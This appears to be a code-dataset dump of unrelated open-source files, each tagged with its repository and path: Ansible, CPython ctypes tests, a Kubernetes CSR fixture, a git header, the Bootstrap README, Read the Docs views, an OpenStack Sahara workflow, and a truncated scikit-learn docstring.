- The result of this filter is different from the Unix dirname program; where dirname for C(/foo/bar/) returns C(/foo), the dirname filter returns the full path (C(/foo/bar/)).
options:
_input:
description: A path.
type: path
required: true
seealso:
- plugin: ansible.builtin.basename
plugin_type: filter
EXAMPLES: |
# To get the dir name of a file path, like '/etc/asdf' out of '/etc/asdf/foo.txt'.
{{ mypath | dirname }}
RETURN:
_value:
description: The directory portion of the original path.
type: path | unknown | github | https://github.com/ansible/ansible | lib/ansible/plugins/filter/dirname.yml |
import unittest, sys
class SimpleTypesTestCase(unittest.TestCase):
def setUp(self):
import ctypes
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
self.prev_conv_mode = set_conversion_mode("ascii", "strict")
def tearDown(self):
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
set_conversion_mode(*self.prev_conv_mode)
def test_subclasses(self):
from ctypes import c_void_p, c_char_p
# ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
class CVOIDP(c_void_p):
def from_param(cls, value):
return value * 2
from_param = classmethod(from_param)
class CCHARP(c_char_p):
def from_param(cls, value):
return value * 4
from_param = classmethod(from_param)
self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")
try:
from ctypes import c_wchar_p
except ImportError:
return
class CWCHARP(c_wchar_p):
def from_param(cls, value):
return value * 3
from_param = classmethod(from_param)
self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")
# XXX Replace by c_char_p tests
def test_cstrings(self):
from ctypes import c_char_p, byref
# c_char_p.from_param on a Python String packs the string
# into a cparam object
s = "123"
self.assertTrue(c_char_p.from_param(s)._obj is s)
# new in 0.9.1: convert (encode) unicode to ascii
self.assertEqual(c_char_p.from_param(u"123")._obj, "123")
self.assertRaises(UnicodeEncodeError, c_char_p.from_param, u"123\377")
self.assertRaises(TypeError, c_char_p.from_param, 42)
# calling c_char_p.from_param with a c_char_p instance
# returns the argument itself:
a = c_char_p("123")
self.assertTrue(c_char_p.from_param(a) is a)
def test_cw_strings(self):
from ctypes import byref
try:
from ctypes import c_wchar_p
except ImportError:
## print "(No c_wchar_p)"
return
s = u"123"
if sys.platform == "win32":
self.assertTrue(c_wchar_p.from_param(s)._obj is s)
self.assertRaises(TypeError, c_wchar_p.from_param, 42)
# new in 0.9.1: convert (decode) ascii to unicode
self.assertEqual(c_wchar_p.from_param("123")._obj, u"123")
self.assertRaises(UnicodeDecodeError, c_wchar_p.from_param, "123\377")
pa = c_wchar_p.from_param(c_wchar_p(u"123"))
self.assertEqual(type(pa), c_wchar_p)
def test_int_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
LPINT = POINTER(c_int)
## p = pointer(c_int(42))
## x = LPINT.from_param(p)
x = LPINT.from_param(pointer(c_int(42)))
self.assertEqual(x.contents.value, 42)
self.assertEqual(LPINT(c_int(42)).contents.value, 42)
self.assertEqual(LPINT.from_param(None), None)
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))
def test_byref_pointer(self):
# The from_param class method of POINTER(typ) classes accepts what is
# returned by byref(obj), it type(obj) == typ
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPINT = POINTER(c_int)
LPINT.from_param(byref(c_int(42)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))
def test_byref_pointerpointer(self):
# See above
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPLPINT = POINTER(POINTER(c_int))
LPLPINT.from_param(byref(pointer(c_int(42))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
if c_int != c_long:
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))
def test_array_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER
INTARRAY = c_int * 3
ia = INTARRAY()
self.assertEqual(len(ia), 3)
self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])
# Pointers are only compatible with arrays containing items of
# the same type!
LPINT = POINTER(c_int)
LPINT.from_param((c_int*3)())
self.assertRaises(TypeError, LPINT.from_param, c_short*3)
self.assertRaises(TypeError, LPINT.from_param, c_long*3)
self.assertRaises(TypeError, LPINT.from_param, c_uint*3)
## def test_performance(self):
## check_perf()
def test_noctypes_argtype(self):
import _ctypes_test
from ctypes import CDLL, c_void_p, ArgumentError
func = CDLL(_ctypes_test.__file__)._testfunc_p_p
func.restype = c_void_p
# TypeError: has no from_param method
self.assertRaises(TypeError, setattr, func, "argtypes", (object,))
class Adapter(object):
def from_param(cls, obj):
return None
func.argtypes = (Adapter(),)
self.assertEqual(func(None), None)
self.assertEqual(func(object()), None)
class Adapter(object):
def from_param(cls, obj):
return obj
func.argtypes = (Adapter(),)
# don't know how to convert parameter 1
self.assertRaises(ArgumentError, func, object())
self.assertEqual(func(c_void_p(42)), 42)
class Adapter(object):
def from_param(cls, obj):
raise ValueError(obj)
func.argtypes = (Adapter(),)
# ArgumentError: argument 1: ValueError: 99
self.assertRaises(ArgumentError, func, 99)
################################################################
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
name: foo
spec:
request: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KTUlJQ2d6Q0NBV3NDQVFBd0ZURVRNQkVHQTFVRUF4TUthM1ZpWlMxaFpHMXBiakNDQVNJd0RRWUpLb1pJaHZjTgpBUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTlJ5dFhkcWV6ZTFBdXFjZkpWYlFBY1BJejZWY2pXSTZ5WmlQa3lrCjAzUW9GaHJGRXhUQXNPTGVFUHlrQXc1YndUOWZiajRXMzZmR2k4RGxsd1FzVGoyYzVUTnBnQkkwbElDbzI4aGcKbHYvTDJsMnRsWUVKdDdTbVhjblNvaGJ5S0h4TERRUHVmTVBBTkZsaEFmTUdCWEhRcmZMajhrTk1MUDA4UlBsbAp0N3V4RDVRdFA0cHlGL1Nhbm1XVEtRNU56WlJ4TC82UmhJMEpxSHJmNFFjQmg2dlR5bnFaRGVmMWVxNjBnQXllClNPRkpKYWRuK3h2VEFqLzgxZk1TbjdOSlNnaktDYkNEeXQ1eS9UZHd0SzZnVUQzM01paE5uNXhKTVF0MUZXUVAKRzY3eTA1QVh6b0pqTm5sWVA1MnJsTlhvNzh6aVMrN1E4RklxQzY0c05vWWhxeGNDQXdFQUFhQXBNQ2NHQ1NxRwpTSWIzRFFFSkRqRWFNQmd3Q1FZRFZSMFRCQUl3QURBTEJnTlZIUThFQkFNQ0JlQXdEUVlKS29aSWh2Y05BUUVMCkJRQURnZ0VCQU5CazlwaHpWYUJBci9xZHN4bXdPR1NQa094UkZlR1lyemRvaW5LTzVGUGZER2JkU0VWQ0o1K0wKeWJTNUtmaUZYU1EvNmk0RE9WRWtxcnFrVElIc1JNSlJwbTZ5Zjk1TU4zSWVLak9jQlV2b2VWVlpxMUNOUU8zagp2dklmK1A1NStLdXpvK0NIT1F5RWlvTlRPaUtGWTJseStEZEEwMXMxbU9FMTZSWGlWeFhGcFhGeGRJVmRPK0oxClZ1MW5yWG5ZVFJQRmtyaG80MTlpaDQzNjRPcGZqYXFXVCtmd20ySVZQSlBoaUJpYi9RRzRhUGJJcFh3amlCUUMKemV6WlM2L01nQkt1bUdMZ3Z5MitXNU9UWTJ5ZFFMZFVxbERFNEU2MFhmdVZ6bk5zWjZDS0tYY1pVaW1ZTkkwNgpKa0t4bGRjd0V2cmI0SmN3M2RFQjdOOUwvSW9ZNXFBPQotLS0tLUVORCBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0K
signerName: kubernetes.io/kube-apiserver-client
usages:
- digital signature
- key encipherment
- client auth | unknown | github | https://github.com/kubernetes/kubernetes | hack/testdata/csr.yml |
#ifndef LINE_RANGE_H
#define LINE_RANGE_H
struct index_state;
/*
* Parse one item in an -L begin,end option w.r.t. the notional file
* object 'cb_data' consisting of 'lines' lines.
*
* The 'nth_line_cb' callback is used to determine the start of the
* line 'lno' inside the 'cb_data'. The caller is expected to already
* have a suitable map at hand to make this a constant-time lookup.
*
* 'anchor' is the 1-based line at which relative range specifications
* should be anchored. Absolute ranges are unaffected by this value.
*
* Returns 0 in case of success and -1 if there was an error. The
* actual range is stored in *begin and *end. The counting starts
* at 1! In case of error, the caller should show usage message.
*/
typedef const char *(*nth_line_fn_t)(void *data, long lno);
int parse_range_arg(const char *arg,
nth_line_fn_t nth_line_cb,
void *cb_data, long lines, long anchor,
long *begin, long *end,
const char *path, struct index_state *istate);
/*
* Scan past a range argument that could be parsed by
* 'parse_range_arg', to help the caller determine the start of the
* filename in '-L n,m:file' syntax.
*
* Returns a pointer to the first character after the 'n,m' part, or
* NULL in case the argument is obviously malformed.
*/
const char *skip_range_arg(const char *arg, struct index_state *istate);
#endif /* LINE_RANGE_H */ | c | github | https://github.com/git/git | line-range.h |
<p align="center">
<a href="https://getbootstrap.com/">
<img src="https://getbootstrap.com/docs/5.3/assets/brand/bootstrap-logo-shadow.png" alt="Bootstrap logo" width="200" height="165">
</a>
</p>
<h3 align="center">Bootstrap</h3>
<p align="center">
Sleek, intuitive, and powerful front-end framework for faster and easier web development.
<br>
<a href="https://getbootstrap.com/docs/5.3/"><strong>Explore Bootstrap docs »</strong></a>
<br>
<br>
<a href="https://github.com/twbs/bootstrap/issues/new?assignees=-&labels=bug&template=bug_report.yml">Report bug</a>
·
<a href="https://github.com/twbs/bootstrap/issues/new?assignees=&labels=feature&template=feature_request.yml">Request feature</a>
·
<a href="https://blog.getbootstrap.com/">Blog</a>
</p>
## Bootstrap 5
Our default branch is for development of our Bootstrap 5 release. Head to the [`v4-dev` branch](https://github.com/twbs/bootstrap/tree/v4-dev) to view the readme, documentation, and source code for Bootstrap 4.
## Table of contents
- [Quick start](#quick-start)
- [Status](#status)
- [What’s included](#whats-included)
- [Bugs and feature requests](#bugs-and-feature-requests)
- [Documentation](#documentation)
- [Contributing](#contributing)
- [Community](#community)
- [Versioning](#versioning)
- [Creators](#creators)
- [Thanks](#thanks)
- [Copyright and license](#copyright-and-license)
## Quick start
Several quick start options are available:
- [Download the latest release](https://github.com/twbs/bootstrap/archive/v5.3.8.zip)
- Clone the repo: `git clone https://github.com/twbs/bootstrap.git`
- Install with [npm](https://www.npmjs.com/): `npm install bootstrap@v5.3.8`
- Install with [yarn](https://yarnpkg.com/): `yarn add bootstrap@v5.3.8`
- Install with [Bun](https://bun.sh/): `bun add bootstrap@v5.3.8`
- Install with [Composer](https://getcomposer.org/): `composer require twbs/bootstrap:5.3.8`
- Install with [NuGet](https://www.nuget.org/): CSS: `Install-Package bootstrap` Sass: `Install-Package bootstrap.sass`
Read the [Getting started page](https://getbootstrap.com/docs/5.3/getting-started/introduction/) for information on the framework contents, templates, examples, and more.
## Status
[](https://github.com/twbs/bootstrap/actions/workflows/js.yml?query=workflow%3AJS+branch%3Amain)
[](https://www.npmjs.com/package/bootstrap)
[](https://rubygems.org/gems/bootstrap)
[](https://atmospherejs.com/twbs/bootstrap)
[](https://packagist.org/packages/twbs/bootstrap)
[](https://www.nuget.org/packages/bootstrap/absoluteLatest)
[](https://coveralls.io/github/twbs/bootstrap?branch=main)
[](https://github.com/twbs/bootstrap/blob/main/dist/css/bootstrap.min.css)
[](https://github.com/twbs/bootstrap/blob/main/dist/css/bootstrap.min.css)
[](https://github.com/twbs/bootstrap/blob/main/dist/js/bootstrap.min.js)
[](https://github.com/twbs/bootstrap/blob/main/dist/js/bootstrap.min.js)

[](#backers)
[](#sponsors)
## What’s included
Within the download you’ll find the following directories and files, logically grouping common assets and providing both compiled and minified variations.
<details>
<summary>Download contents</summary>
```text
bootstrap/
├── css/
│ ├── bootstrap-grid.css
│ ├── bootstrap-grid.css.map
│ ├── bootstrap-grid.min.css
│ ├── bootstrap-grid.min.css.map
│ ├── bootstrap-grid.rtl.css
│ ├── bootstrap-grid.rtl.css.map
│ ├── bootstrap-grid.rtl.min.css
│ ├── bootstrap-grid.rtl.min.css.map
│ ├── bootstrap-reboot.css
│ ├── bootstrap-reboot.css.map
│ ├── bootstrap-reboot.min.css
│ ├── bootstrap-reboot.min.css.map
│ ├── bootstrap-reboot.rtl.css
│ ├── bootstrap-reboot.rtl.css.map
│ ├── bootstrap-reboot.rtl.min.css
│ ├── bootstrap-reboot.rtl.min.css.map
│ ├── bootstrap-utilities.css
│ ├── bootstrap-utilities.css.map
│ ├── bootstrap-utilities.min.css
│ ├── bootstrap-utilities.min.css.map
│ ├── bootstrap-utilities.rtl.css
│ ├── bootstrap-utilities.rtl.css.map
│ ├── bootstrap-utilities.rtl.min.css
│ ├── bootstrap-utilities.rtl.min.css.map
│ ├── bootstrap.css
│ ├── bootstrap.css.map
│ ├── bootstrap.min.css
│ ├── bootstrap.min.css.map
│ ├── bootstrap.rtl.css
│ ├── bootstrap.rtl.css.map
│ ├── bootstrap.rtl.min.css
│ └── bootstrap.rtl.min.css.map
└── js/
├── bootstrap.bundle.js
├── bootstrap.bundle.js.map
├── bootstrap.bundle.min.js
├── bootstrap.bundle.min.js.map
├── bootstrap.esm.js
├── bootstrap.esm.js.map
├── bootstrap.esm.min.js
├── bootstrap.esm.min.js.map
├── bootstrap.js
├── bootstrap.js.map
├── bootstrap.min.js
└── bootstrap.min.js.map
```
</details>
We provide compiled CSS and JS (`bootstrap.*`), as well as compiled and minified CSS and JS (`bootstrap.min.*`). [Source maps](https://web.dev/articles/source-maps) (`bootstrap.*.map`) are available for use with certain browsers’ developer tools. Bundled JS files (`bootstrap.bundle.js` and minified `bootstrap.bundle.min.js`) include [Popper](https://popper.js.org/docs/v2/).
## Bugs and feature requests
Have a bug or a feature request? Please first read the [issue guidelines](https://github.com/twbs/bootstrap/blob/main/.github/CONTRIBUTING.md#using-the-issue-tracker) and search for existing and closed issues. If your problem or idea is not addressed yet, [please open a new issue](https://github.com/twbs/bootstrap/issues/new/choose).
## Documentation
Bootstrap’s documentation, included in this repo in the root directory, is built with [Astro](https://astro.build/) and publicly hosted on GitHub Pages at <https://getbootstrap.com/>. The docs may also be run locally.
Documentation search is powered by [Algolia's DocSearch](https://docsearch.algolia.com/).
### Running documentation locally
1. Run `npm install` to install the Node.js dependencies, including Astro (the site builder).
2. Run `npm run test` (or a specific npm script) to rebuild distributed CSS and JavaScript files, as well as our docs assets.
3. From the root `/bootstrap` directory, run `npm run docs-serve` in the command line.
4. Open <http://localhost:9001> in your browser, and voilà.
Learn more about using Astro by reading its [documentation](https://docs.astro.build/en/getting-started/).
### Documentation for previous releases
You can find all our previous releases docs on <https://getbootstrap.com/docs/versions/>.
[Previous releases](https://github.com/twbs/bootstrap/releases) and their documentation are also available for download.
## Contributing
Please read through our [contributing guidelines](https://github.com/twbs/bootstrap/blob/main/.github/CONTRIBUTING.md). Included are directions for opening issues, coding standards, and notes on development.
Moreover, if your pull request contains JavaScript patches or features, you must include [relevant unit tests](https://github.com/twbs/bootstrap/tree/main/js/tests). All HTML and CSS should conform to the [Code Guide](https://github.com/mdo/code-guide), maintained by [Mark Otto](https://github.com/mdo).
Editor preferences are available in the [editor config](https://github.com/twbs/bootstrap/blob/main/.editorconfig) for easy use in common text editors. Read more and download plugins at <https://editorconfig.org/>.
## Community
Get updates on Bootstrap’s development and chat with the project maintainers and community members.
- Follow [@getbootstrap on X](https://x.com/getbootstrap).
- Read and subscribe to [The Official Bootstrap Blog](https://blog.getbootstrap.com/).
- Ask questions and explore [our GitHub Discussions](https://github.com/twbs/bootstrap/discussions).
- Discuss, ask questions, and more on [the community Discord](https://discord.gg/bZUvakRU3M) or [Bootstrap subreddit](https://www.reddit.com/r/bootstrap/).
- Chat with fellow Bootstrappers in IRC. On the `irc.libera.chat` server, in the `#bootstrap` channel.
- Implementation help may be found at Stack Overflow (tagged [`bootstrap-5`](https://stackoverflow.com/questions/tagged/bootstrap-5)).
- Developers should use the keyword `bootstrap` on packages which modify or add to the functionality of Bootstrap when distributing through [npm](https://www.npmjs.com/browse/keyword/bootstrap) or similar delivery mechanisms for maximum discoverability.
## Versioning
For transparency into our release cycle and in striving to maintain backward compatibility, Bootstrap is maintained under [the Semantic Versioning guidelines](https://semver.org/). Sometimes we screw up, but we adhere to those rules whenever possible.
See [the Releases section of our GitHub project](https://github.com/twbs/bootstrap/releases) for changelogs for each release version of Bootstrap. Release announcement posts on [the official Bootstrap blog](https://blog.getbootstrap.com/) contain summaries of the most noteworthy changes made in each release.
## Creators
**Mark Otto**
- <https://x.com/mdo>
- <https://github.com/mdo>
**Jacob Thornton**
- <https://x.com/fat>
- <https://github.com/fat>
## Thanks
<a href="https://www.browserstack.com/">
<img src="https://live.browserstack.com/images/opensource/browserstack-logo.svg" alt="BrowserStack" width="192" height="42">
</a>
Thanks to [BrowserStack](https://www.browserstack.com/) for providing the infrastructure that allows us to test in real browsers!
<a href="https://www.netlify.com/">
<img src="https://www.netlify.com/v3/img/components/full-logo-light.svg" alt="Netlify" width="147" height="40">
</a>
Thanks to [Netlify](https://www.netlify.com/) for providing us with Deploy Previews!
## Sponsors
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [[Become a sponsor](https://opencollective.com/bootstrap#sponsor)]
[](https://opencollective.com/bootstrap/sponsor/0/website)
[](https://opencollective.com/bootstrap/sponsor/1/website)
[](https://opencollective.com/bootstrap/sponsor/2/website)
[](https://opencollective.com/bootstrap/sponsor/3/website)
[](https://opencollective.com/bootstrap/sponsor/4/website)
[](https://opencollective.com/bootstrap/sponsor/5/website)
[](https://opencollective.com/bootstrap/sponsor/6/website)
[](https://opencollective.com/bootstrap/sponsor/7/website)
[](https://opencollective.com/bootstrap/sponsor/8/website)
[](https://opencollective.com/bootstrap/sponsor/9/website)
## Backers
Thank you to all our backers! 🙏 [[Become a backer](https://opencollective.com/bootstrap#backer)]
[](https://opencollective.com/bootstrap#backers)
## Copyright and license
Code and documentation copyright 2011-2025 the [Bootstrap Authors](https://github.com/twbs/bootstrap/graphs/contributors). Code released under the [MIT License](https://github.com/twbs/bootstrap/blob/main/LICENSE). Docs released under [Creative Commons](https://creativecommons.org/licenses/by/3.0/). | unknown | github | https://github.com/twbs/bootstrap | README.md |
import logging
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from django.http import HttpResponsePermanentRedirect
from django.conf import settings
from django.core.urlresolvers import reverse
from rest_framework.renderers import JSONRenderer
from readthedocs.builds.models import Build, Version
from readthedocs.builds.filters import BuildFilter
from readthedocs.projects.models import Project
from readthedocs.restapi.serializers import BuildSerializerFull
from redis import Redis, ConnectionError
log = logging.getLogger(__name__)
class BuildList(ListView):
model = Build
def get_queryset(self):
self.project_slug = self.kwargs.get('project_slug', None)
self.project = get_object_or_404(
Project.objects.protected(self.request.user),
slug=self.project_slug
)
queryset = Build.objects.filter(project=self.project)
return queryset
def get_context_data(self, **kwargs):
context = super(BuildList, self).get_context_data(**kwargs)
filter = BuildFilter(self.request.GET, queryset=self.get_queryset())
active_builds = self.get_queryset().exclude(state="finished").values('id')
context['project'] = self.project
context['filter'] = filter
context['active_builds'] = active_builds
context['versions'] = Version.objects.public(user=self.request.user, project=self.project)
try:
redis = Redis(**settings.REDIS)
context['queue_length'] = redis.llen('celery')
except ConnectionError:
context['queue_length'] = None
return context
class BuildDetail(DetailView):
model = Build
def get_queryset(self):
self.project_slug = self.kwargs.get('project_slug', None)
self.project = get_object_or_404(
Project.objects.protected(self.request.user),
slug=self.project_slug
)
queryset = Build.objects.filter(project=self.project)
return queryset
def get_context_data(self, **kwargs):
context = super(BuildDetail, self).get_context_data(**kwargs)
context['project'] = self.project
build_serializer = BuildSerializerFull(self.get_object())
build_data = build_serializer.data
context['build_json'] = (JSONRenderer()
.render(build_data))
return context
def builds_redirect_list(request, project_slug):
return HttpResponsePermanentRedirect(reverse('builds_project_list', args=[project_slug]))
def builds_redirect_detail(request, project_slug, pk):
return HttpResponsePermanentRedirect(reverse('builds_detail', args=[project_slug, pk])) | unknown | codeparrot/codeparrot-clean | ||
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import logging
from django.utils.translation import ugettext_lazy as _
from saharaclient.api import base as api_base
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard.contrib.sahara.api import sahara as saharaclient
from openstack_dashboard.contrib.sahara.content.data_processing. \
utils import helpers as helpers
from openstack_dashboard.contrib.sahara.content.data_processing. \
utils import anti_affinity as aa
import openstack_dashboard.contrib.sahara.content.data_processing. \
utils.workflow_helpers as whelpers
LOG = logging.getLogger(__name__)
class SelectPluginAction(workflows.Action):
hidden_create_field = forms.CharField(
required=False,
widget=forms.HiddenInput(attrs={"class": "hidden_create_field"}))
def __init__(self, request, *args, **kwargs):
super(SelectPluginAction, self).__init__(request, *args, **kwargs)
try:
plugins = saharaclient.plugin_list(request)
except Exception:
plugins = []
exceptions.handle(request,
_("Unable to fetch plugin list."))
plugin_choices = [(plugin.name, plugin.title) for plugin in plugins]
self.fields["plugin_name"] = forms.ChoiceField(
label=_("Plugin name"),
choices=plugin_choices,
widget=forms.Select(attrs={"class": "plugin_name_choice"}))
for plugin in plugins:
field_name = plugin.name + "_version"
choice_field = forms.ChoiceField(
label=_("Version"),
choices=[(version, version) for version in plugin.versions],
widget=forms.Select(
attrs={"class": "plugin_version_choice "
+ field_name + "_choice"})
)
self.fields[field_name] = choice_field
class Meta(object):
name = _("Select plugin and hadoop version for cluster template")
help_text_template = ("project/data_processing.cluster_templates/"
"_create_general_help.html")
class SelectPlugin(workflows.Step):
action_class = SelectPluginAction
class CreateClusterTemplate(workflows.Workflow):
slug = "create_cluster_template"
name = _("Create Cluster Template")
finalize_button_name = _("Next")
success_message = _("Created")
failure_message = _("Could not create")
success_url = "horizon:project:data_processing.cluster_templates:index"
default_steps = (SelectPlugin,)
class GeneralConfigAction(workflows.Action):
hidden_configure_field = forms.CharField(
required=False,
widget=forms.HiddenInput(attrs={"class": "hidden_configure_field"}))
hidden_to_delete_field = forms.CharField(
required=False,
widget=forms.HiddenInput(attrs={"class": "hidden_to_delete_field"}))
cluster_template_name = forms.CharField(label=_("Template Name"))
description = forms.CharField(label=_("Description"),
required=False,
widget=forms.Textarea(attrs={'rows': 4}))
use_autoconfig = forms.BooleanField(
label=_("Auto-configure"),
help_text=_("If selected, instances of a cluster will be "
"automatically configured during creation. Otherwise you "
"should manually specify configuration values"),
required=False,
widget=forms.CheckboxInput(),
initial=True,
)
anti_affinity = aa.anti_affinity_field()
def __init__(self, request, *args, **kwargs):
super(GeneralConfigAction, self).__init__(request, *args, **kwargs)
plugin, hadoop_version = whelpers.\
get_plugin_and_hadoop_version(request)
self.fields["plugin_name"] = forms.CharField(
widget=forms.HiddenInput(),
initial=plugin
)
self.fields["hadoop_version"] = forms.CharField(
widget=forms.HiddenInput(),
initial=hadoop_version
)
populate_anti_affinity_choices = aa.populate_anti_affinity_choices
def get_help_text(self):
extra = dict()
plugin, hadoop_version = whelpers\
.get_plugin_and_hadoop_version(self.request)
extra["plugin_name"] = plugin
extra["hadoop_version"] = hadoop_version
return super(GeneralConfigAction, self).get_help_text(extra)
def clean(self):
cleaned_data = super(GeneralConfigAction, self).clean()
if cleaned_data.get("hidden_configure_field", None) \
== "create_nodegroup":
self._errors = dict()
return cleaned_data
class Meta(object):
name = _("Details")
help_text_template = ("project/data_processing.cluster_templates/"
"_configure_general_help.html")
class GeneralConfig(workflows.Step):
action_class = GeneralConfigAction
contributes = ("hidden_configure_field", )
def contribute(self, data, context):
for k, v in data.items():
context["general_" + k] = v
post = self.workflow.request.POST
context['anti_affinity_info'] = post.getlist("anti_affinity")
return context
class ConfigureNodegroupsAction(workflows.Action):
hidden_nodegroups_field = forms.CharField(
required=False,
widget=forms.HiddenInput(attrs={"class": "hidden_nodegroups_field"}))
forms_ids = forms.CharField(
required=False,
widget=forms.HiddenInput())
def __init__(self, request, *args, **kwargs):
super(ConfigureNodegroupsAction, self). \
__init__(request, *args, **kwargs)
plugin = request.REQUEST.get("plugin_name")
version = request.REQUEST.get("hadoop_version")
if plugin and not version:
version_name = plugin + "_version"
version = request.REQUEST.get(version_name)
if not plugin or not version:
self.templates = saharaclient.nodegroup_template_find(request)
else:
self.templates = saharaclient.nodegroup_template_find(
request, plugin_name=plugin, hadoop_version=version)
deletable = request.REQUEST.get("deletable", dict())
request_source = None
if 'forms_ids' in request.POST:
request_source = request.POST
elif 'forms_ids' in request.REQUEST:
request_source = request.REQUEST
if request_source:
self.groups = []
for id in json.loads(request_source['forms_ids']):
group_name = "group_name_" + str(id)
template_id = "template_id_" + str(id)
count = "count_" + str(id)
serialized = "serialized_" + str(id)
self.groups.append({"name": request_source[group_name],
"template_id": request_source[template_id],
"count": request_source[count],
"id": id,
"deletable": deletable.get(
request_source[group_name], "true"),
"serialized": request_source[serialized]})
whelpers.build_node_group_fields(self,
group_name,
template_id,
count,
serialized)
def clean(self):
cleaned_data = super(ConfigureNodegroupsAction, self).clean()
if cleaned_data.get("hidden_nodegroups_field", None) \
== "create_nodegroup":
self._errors = dict()
return cleaned_data
class Meta(object):
name = _("Node Groups")
class ConfigureNodegroups(workflows.Step):
action_class = ConfigureNodegroupsAction
contributes = ("hidden_nodegroups_field", )
template_name = ("project/data_processing.cluster_templates/"
"cluster_node_groups_template.html")
def contribute(self, data, context):
for k, v in data.items():
context["ng_" + k] = v
return context
class ConfigureClusterTemplate(whelpers.ServiceParametersWorkflow,
whelpers.StatusFormatMixin):
slug = "configure_cluster_template"
name = _("Create Cluster Template")
finalize_button_name = _("Create")
success_message = _("Created Cluster Template %s")
name_property = "general_cluster_template_name"
success_url = "horizon:project:data_processing.cluster_templates:index"
default_steps = (GeneralConfig,
ConfigureNodegroups)
def __init__(self, request, context_seed, entry_point, *args, **kwargs):
ConfigureClusterTemplate._cls_registry = set([])
hlps = helpers.Helpers(request)
plugin, hadoop_version = whelpers.\
get_plugin_and_hadoop_version(request)
general_parameters = hlps.get_cluster_general_configs(
plugin,
hadoop_version)
service_parameters = hlps.get_targeted_cluster_configs(
plugin,
hadoop_version)
self._populate_tabs(general_parameters, service_parameters)
super(ConfigureClusterTemplate, self).__init__(request,
context_seed,
entry_point,
*args, **kwargs)
def is_valid(self):
steps_valid = True
for step in self.steps:
if not step.action.is_valid():
steps_valid = False
step.has_errors = True
errors_fields = list(step.action.errors.keys())
step.action.errors_fields = errors_fields
if not steps_valid:
return steps_valid
return self.validate(self.context)
def handle(self, request, context):
try:
node_groups = []
configs_dict = whelpers.parse_configs_from_context(context,
self.defaults)
ids = json.loads(context['ng_forms_ids'])
for id in ids:
name = context['ng_group_name_' + str(id)]
template_id = context['ng_template_id_' + str(id)]
count = context['ng_count_' + str(id)]
raw_ng = context.get("ng_serialized_" + str(id))
if raw_ng and raw_ng != 'null':
ng = json.loads(base64.urlsafe_b64decode(str(raw_ng)))
else:
ng = dict()
ng["name"] = name
ng["count"] = count
if template_id and template_id != u'None':
ng["node_group_template_id"] = template_id
node_groups.append(ng)
plugin, hadoop_version = whelpers.\
get_plugin_and_hadoop_version(request)
# TODO(nkonovalov): Fix client to support default_image_id
saharaclient.cluster_template_create(
request,
context["general_cluster_template_name"],
plugin,
hadoop_version,
context["general_description"],
configs_dict,
node_groups,
context["anti_affinity_info"],
use_autoconfig=context['general_use_autoconfig']
)
hlps = helpers.Helpers(request)
if hlps.is_from_guide():
request.session["guide_cluster_template_name"] = (
context["general_cluster_template_name"])
self.success_url = (
"horizon:project:data_processing.wizard:cluster_guide")
return True
except api_base.APIException as e:
self.error_description = str(e)
return False
except Exception:
exceptions.handle(request,
_("Cluster template creation failed"))
return False | unknown | codeparrot/codeparrot-clean | ||
"""Unsupervised nearest neighbors learner"""
from .base import NeighborsBase
from .base import KNeighborsMixin
from .base import RadiusNeighborsMixin
from .base import UnsupervisedMixin
class NearestNeighbors(NeighborsBase, KNeighborsMixin,
RadiusNeighborsMixin, UnsupervisedMixin):
"""Unsupervised learner for implementing neighbor searches.
Read more in the :ref:`User Guide <unsupervised_neighbors>`.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`k_neighbors` queries.
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth`radius_neighbors`
queries.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDtree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p: integer, optional (default = 2)
Parameter for the Minkowski metric from
sklearn.metrics.pairwise.pairwise_distances. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
